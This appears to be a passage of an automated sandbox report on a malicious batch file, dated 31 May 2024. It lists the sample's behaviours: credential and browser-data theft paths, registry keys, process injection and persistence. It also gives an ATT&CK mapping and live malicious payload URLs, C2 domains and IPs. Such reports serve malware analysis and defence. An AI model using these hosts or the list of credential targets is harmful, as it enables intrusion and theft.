              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_21CB2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,11_2_21CB2264
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,17_2_004082CD
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0041739B GetVersionExW,16_2_0041739B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 0000001E.00000002.3417567901.0000000000EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.3098127241.0000000003000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.3408938742.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.3137363083.0000000022D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.3417419300.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.3416540680.0000000003100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.3417935091.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7108, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\jiourhjs.dat, type: DROPPED
              Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
              Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
              Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Source: C:\Windows\SysWOW64\clip.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: ESMTPPassword17_2_004033F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword17_2_00402DB3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword17_2_00402DB3
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7108, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 6460, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 0000001E.00000002.3417567901.0000000000EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.3098127241.0000000003000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.3408938742.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.3137363083.0000000022D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.3417419300.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.3416540680.0000000003100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.3417935091.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7108, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\jiourhjs.dat, type: DROPPED
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information112
              Scripting
              Valid Accounts1
              Windows Management Instrumentation
              112
              Scripting
              1
              Abuse Elevation Control Mechanism
              1
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              3
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts11
              Native API
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Abuse Elevation Control Mechanism
              11
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              21
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution
              11
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              2
              Obfuscated Files or Information
              2
              Credentials in Registry
              3
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts112
              Command and Scripting Interpreter
              Login Hook412
              Process Injection
              1
              Software Packing
              1
              Credentials In Files
              29
              System Information Discovery
              Distributed Component Object Model11
              Input Capture
              4
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud Accounts2
              PowerShell
              Network Logon Script11
              Registry Run Keys / Startup Folder
              1
              DLL Side-Loading
              LSA Secrets1
              Query Registry
              SSH2
              Clipboard Data
              15
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Masquerading
              Cached Domain Credentials51
              Security Software Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Modify Registry
              DCSync51
              Virtualization/Sandbox Evasion
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job51
              Virtualization/Sandbox Evasion
              Proc Filesystem4
              Process Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Access Token Manipulation
              /etc/passwd and /etc/shadow1
              Application Window Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron412
              Process Injection
              Network Sniffing1
              System Owner/User Discovery
              Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
              Rundll32
              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1449968 Sample: MATALJ Kft Rendel#U00e9s H6... Startdate: 31/05/2024 Architecture: WINDOWS Score: 100 87 jgbours284hawara02.duckdns.org 2->87 89 www.led-svitidla.eu 2->89 91 6 other IPs or domains 2->91 109 Snort IDS alert for network traffic 2->109 111 Multi AV Scanner detection for domain / URL 2->111 113 Malicious sample detected (through community Yara rule) 2->113 117 13 other signatures 2->117 15 cmd.exe 1 2->15         started        18 wab.exe 2->18         started        20 rundll32.exe 2->20         started        22 wab.exe 2->22         started        signatures3 115 Uses dynamic DNS services 87->115 process4 signatures5 161 Suspicious powershell command line found 15->161 163 Wscript starts Powershell (via cmd or directly) 15->163 165 Very long command line found 15->165 24 powershell.exe 14 23 15->24         started        28 conhost.exe 15->28         started        process6 dnsIp7 99 194.59.30.6, 49712, 51544, 80 COMBAHTONcombahtonGmbHDE Germany 24->99 127 Suspicious powershell command line found 24->127 129 Very long command line found 24->129 131 Found suspicious powershell code related to unpacking or dynamic code loading 24->131 30 powershell.exe 17 24->30         started        33 conhost.exe 24->33         started        35 dllhost.exe 24->35         started        37 cmd.exe 1 24->37         started        signatures8 process9 signatures10 139 Suspicious powershell command line found 30->139 141 Very long command line found 30->141 143 Writes to foreign memory regions 30->143 145 Found suspicious powershell code related to unpacking or dynamic code loading 30->145 39 wab.exe 8 16 30->39         started        44 cmd.exe 1 30->44         started        process11 dnsIp12 93 jgbours284hawara02.duckdns.org 178.215.236.110, 3050, 51547, 51548 LVLT-10753US Germany 39->93 95 geoplugin.net 178.237.33.50, 51550, 80 ATOM86-ASATOM86NL Netherlands 39->95 83 C:\Users\user\AppData\Roaming\jiourhjs.dat, data 39->83 dropped 85 IMG-46657388578355...tingsmedlemmers.vbs, ASCII 39->85 dropped 133 Maps a DLL or memory area into another process 39->133 135 Installs a global keyboard hook 39->135 46 wscript.exe 1 39->46         started        49 wab.exe 1 39->49         started        51 wab.exe 1 39->51         started        53 2 other processes 39->53 file13 signatures14 process15 signatures16 147 Suspicious powershell command line found 46->147 149 Wscript starts Powershell (via cmd or directly) 46->149 151 Very long command line found 46->151 159 2 other signatures 46->159 55 powershell.exe 46->55         started        153 Tries to steal Instant Messenger accounts or passwords 49->153 155 Tries to harvest and steal browser information (history, passwords, etc) 49->155 157 Tries to steal Mail credentials (via file / registry access) 51->157 59 reg.exe 1 1 53->59         started        61 conhost.exe 53->61         started        process17 dnsIp18 97 ramirex.ro 188.215.50.15, 443, 51553, 51555 WEBCLASSITRO Romania 55->97 121 Suspicious powershell command line found 55->121 123 Very long command line found 55->123 63 powershell.exe 55->63         started        66 conhost.exe 55->66         started        68 cmd.exe 55->68         started        125 Creates multiple autostart registry keys 59->125 signatures19 process20 signatures21 167 Writes to foreign memory regions 63->167 70 wab.exe 63->70         started        73 cmd.exe 63->73         started        75 wab.exe 63->75         started        process22 signatures23 119 Maps a DLL or memory area into another process 70->119 77 sofUaEnRVTAexkDmTx.exe 70->77 injected process24 signatures25 137 Found direct / indirect Syscall (likely to bypass EDR) 77->137 80 clip.exe 77->80         started        process26 signatures27 101 Tries to steal Mail credentials (via file / registry access) 80->101 103 Creates multiple autostart registry keys 80->103 105 Tries to harvest and steal browser information (history, passwords, etc) 80->105 107 3 other signatures 80->107

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.bat14%VirustotalBrowse
              MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.bat13%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              led-svitidla.eu0%VirustotalBrowse
              geoplugin.net0%VirustotalBrowse
              jgbours284hawara02.duckdns.org5%VirustotalBrowse
              ramirex.ro0%VirustotalBrowse
              www.led-svitidla.eu0%VirustotalBrowse
              103.169.127.40.in-addr.arpa1%VirustotalBrowse
              171.39.242.20.in-addr.arpa1%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://www.imvu.comr0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              http://crl.microsoft0%URL Reputationsafe
              http://crl.microsoft0%URL Reputationsafe
              http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              http://www.imvu.com0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://geoplugin.net/json.gp100%URL Reputationphishing
              https://aka.ms/pscore6lB0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://login.yahoo.com/config/login0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://www.ebuddy.com0%URL Reputationsafe
              http://194.59.30.6/UWYVFXQWh32.bin100%Avira URL Cloudmalware
              http://www.387mfyr.sbs/abt9/?URl0T=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtP4lJF/NTbeuWt8c3rTDi+tIT1z/PR+XwsW/JFZfA6LrcKjOeOKI=&_t6=urjP348hAPL0Tj-P0%Avira URL Cloudsafe
              http://www.imvu.compData0%Avira URL Cloudsafe
              http://194.59.30.6/Uncomic.mdpXR0%Avira URL Cloudsafe
              http://194.59.30.6/Uncomic.mdpP0%Avira URL Cloudsafe
              http://www.nirsoft.net0%Avira URL Cloudsafe
              https://ramirex.ro/Rutschebanes.qxd0%Avira URL Cloudsafe
              http://ramirex.ro0%Avira URL Cloudsafe
              https://github.com/Pester/Pester0%Avira URL Cloudsafe
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
              http://194.59.30.6/UWYVFXQWh32.bin0%VirustotalBrowse
              http://www.led-svitidla.eu/abt9/0%Avira URL Cloudsafe
              http://www.nirsoft.net0%VirustotalBrowse
              https://www.google.com0%Avira URL Cloudsafe
              https://ramirex.ro/Rutschebanes.qxd0%VirustotalBrowse
              https://ramirex.ro/Rutschebanes.qxdXR0%Avira URL Cloudsafe
              http://194.59.30.6/UWYVFXQWh32.binB0%Avira URL Cloudsafe
              http://crl.microso0%Avira URL Cloudsafe
              http://194.59.30.6/UWYVFXQWh32.binHovesValramirex.ro/UWYVFXQWh32.bin0%Avira URL Cloudsafe
              https://github.com/Pester/Pester1%VirustotalBrowse
              http://ramirex.ro0%VirustotalBrowse
              http://194.59.30.60%Avira URL Cloudsafe
              https://www.google.com/accounts/servicelogin0%Avira URL Cloudsafe
              http://www.microsof.0%Avira URL Cloudsafe
              http://www.nirsoft.net/0%Avira URL Cloudsafe
              https://ramirex.ro/HtwvlcDSFcrAhhcHdD97.bin0%Avira URL Cloudsafe
              http://194.59.30.6/Uncomic.mdp100%Avira URL Cloudmalware
              http://194.59.30.63%VirustotalBrowse
              https://ramirex.ro0%Avira URL Cloudsafe
              https://ramirex.ro/HtwvlcDSFcrAhhcHdD97.bin0%VirustotalBrowse
              https://www.google.com/accounts/servicelogin0%VirustotalBrowse
              https://www.google.com0%VirustotalBrowse
              https://ramirex.ro0%VirustotalBrowse
              http://www.nirsoft.net/0%VirustotalBrowse
              http://194.59.30.6/Uncomic.mdp7%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              www.387mfyr.sbs
              137.220.252.40
              truefalse
                unknown
                led-svitidla.eu
                37.235.104.9
                truefalseunknown
                geoplugin.net
                178.237.33.50
                truefalseunknown
                jgbours284hawara02.duckdns.org
                178.215.236.110
                truetrueunknown
                ramirex.ro
                188.215.50.15
                truefalseunknown
                103.169.127.40.in-addr.arpa
                unknown
                unknowntrueunknown
                www.led-svitidla.eu
                unknown
                unknowntrueunknown
                171.39.242.20.in-addr.arpa
                unknown
                unknowntrueunknown
                NameMaliciousAntivirus DetectionReputation
                http://194.59.30.6/UWYVFXQWh32.binfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: malware
                unknown
                http://www.387mfyr.sbs/abt9/?URl0T=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtP4lJF/NTbeuWt8c3rTDi+tIT1z/PR+XwsW/JFZfA6LrcKjOeOKI=&_t6=urjP348hAPL0Tj-Pfalse
                • Avira URL Cloud: safe
                unknown
                https://ramirex.ro/Rutschebanes.qxdfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://www.led-svitidla.eu/abt9/false
                • Avira URL Cloud: safe
                unknown
                http://geoplugin.net/json.gptrue
                • URL Reputation: phishing
                unknown
                https://ramirex.ro/HtwvlcDSFcrAhhcHdD97.binfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://194.59.30.6/Uncomic.mdpfalse
                • 7%, Virustotal, Browse
                • Avira URL Cloud: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.2669451040.0000024A52932000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2503901264.000000000593A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2503901264.0000000005A77000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.imvu.comrwab.exe, 0000000B.00000002.3437805432.00000000226E0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.2538519469.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.2503089959.0000000004A2D000.00000004.00000800.00020000.00000000.sdmptrue
                • URL Reputation: malware
                • URL Reputation: malware
                unknown
                http://194.59.30.6/Uncomic.mdpPpowershell.exe, 00000003.00000002.2579735465.0000024A42AED000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://crl.microsoftpowershell.exe, 00000014.00000002.3389504984.0000000007630000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.2503089959.0000000004A2D000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.imvu.compDatawab.exe, 00000012.00000002.2541165592.0000000002BBD000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://go.micropowershell.exe, 00000003.00000002.2579735465.0000024A43B13000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://contoso.com/Licensepowershell.exe, 00000006.00000002.2503901264.0000000005A77000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.imvu.comwab.exe, wab.exe, 00000012.00000002.2538519469.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.2541165592.0000000002BBD000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://contoso.com/Iconpowershell.exe, 00000006.00000002.2503901264.0000000005A77000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://194.59.30.6/Uncomic.mdpXRpowershell.exe, 00000006.00000002.2503089959.0000000004A2D000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.nirsoft.netwab.exe, 00000010.00000002.2560201870.0000000000164000.00000004.00000010.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://ramirex.ropowershell.exe, 00000014.00000002.3321380834.0000000004F63000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.2503089959.0000000004A2D000.00000004.00000800.00020000.00000000.sdmpfalse
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comwab.exe, 0000000B.00000002.3437805432.00000000226E0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.2538519469.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://www.google.comwab.exe, wab.exe, 00000012.00000002.2538519469.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://ramirex.ro/Rutschebanes.qxdXRpowershell.exe, 00000014.00000002.3321380834.0000000004C8B000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://194.59.30.6/UWYVFXQWh32.binBwab.exe, 0000000B.00000002.3423060854.000000000605B000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://crl.microsopowershell.exe, 00000003.00000002.2687473128.0000024A5ABB6000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://aka.ms/pscore6lBpowershell.exe, 00000006.00000002.2503089959.00000000048D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3321380834.0000000004B36000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://contoso.com/powershell.exe, 00000006.00000002.2503901264.0000000005A77000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.2669451040.0000024A52932000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2503901264.000000000593A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2503901264.0000000005A77000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://194.59.30.6/UWYVFXQWh32.binHovesValramirex.ro/UWYVFXQWh32.binwab.exe, 0000000B.00000002.3436368353.0000000021810000.00000004.00001000.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://194.59.30.6powershell.exe, 00000003.00000002.2579735465.0000024A42CFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2579735465.0000024A44318000.00000004.00000800.00020000.00000000.sdmpfalse
                • 3%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://www.google.com/accounts/serviceloginwab.exefalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://login.yahoo.com/config/loginwab.exefalse
                • URL Reputation: safe
                unknown
                http://www.microsof.powershell.exe, 00000006.00000002.2505588191.00000000072DF000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://aka.ms/pscore68powershell.exe, 00000003.00000002.2579735465.0000024A428C1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.nirsoft.net/wab.exe, 00000012.00000002.2538519469.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.2579735465.0000024A428C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2503089959.00000000048D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3321380834.0000000004B36000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://ramirex.ropowershell.exe, 00000014.00000002.3321380834.0000000004C8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3321380834.0000000004F5E000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://www.ebuddy.comwab.exe, wab.exe, 00000012.00000002.2538519469.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                178.215.236.110
                jgbours284hawara02.duckdns.orgGermany
                10753LVLT-10753UStrue
                137.220.252.40
                www.387mfyr.sbsSingapore
                64050BCPL-SGBGPNETGlobalASNSGfalse
                194.59.30.6
                unknownGermany
                30823COMBAHTONcombahtonGmbHDEfalse
                37.235.104.9
                led-svitidla.euCzech Republic
                39392SUPERNETWORK_CZfalse
                188.215.50.15
                ramirex.roRomania
                34358WEBCLASSITROfalse
                178.237.33.50
                geoplugin.netNetherlands
                8455ATOM86-ASATOM86NLfalse
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1449968
                Start date and time:2024-05-31 08:08:08 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 11m 15s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:33
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:2
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.bat
                renamed because original name is a hash value
                Original Sample Name:MATALJ Kft Rendels H634667478874873845985309802Thayne.bat
                Detection:MAL
                Classification:mal100.phis.troj.spyw.expl.evad.winBAT@47/20@7/6
                EGA Information:
                • Successful, ratio: 62.5%
                HCA Information:
                • Successful, ratio: 96%
                • Number of executed functions: 173
                • Number of non-executed functions: 299
                Cookbook Comments:
                • Found application associated with file extension: .bat
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target powershell.exe, PID 2084 because it is empty
                • Execution Graph export aborted for target powershell.exe, PID 4972 because it is empty
                • Execution Graph export aborted for target powershell.exe, PID 504 because it is empty
                • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • Not all processes where analyzed, report is missing behavior information
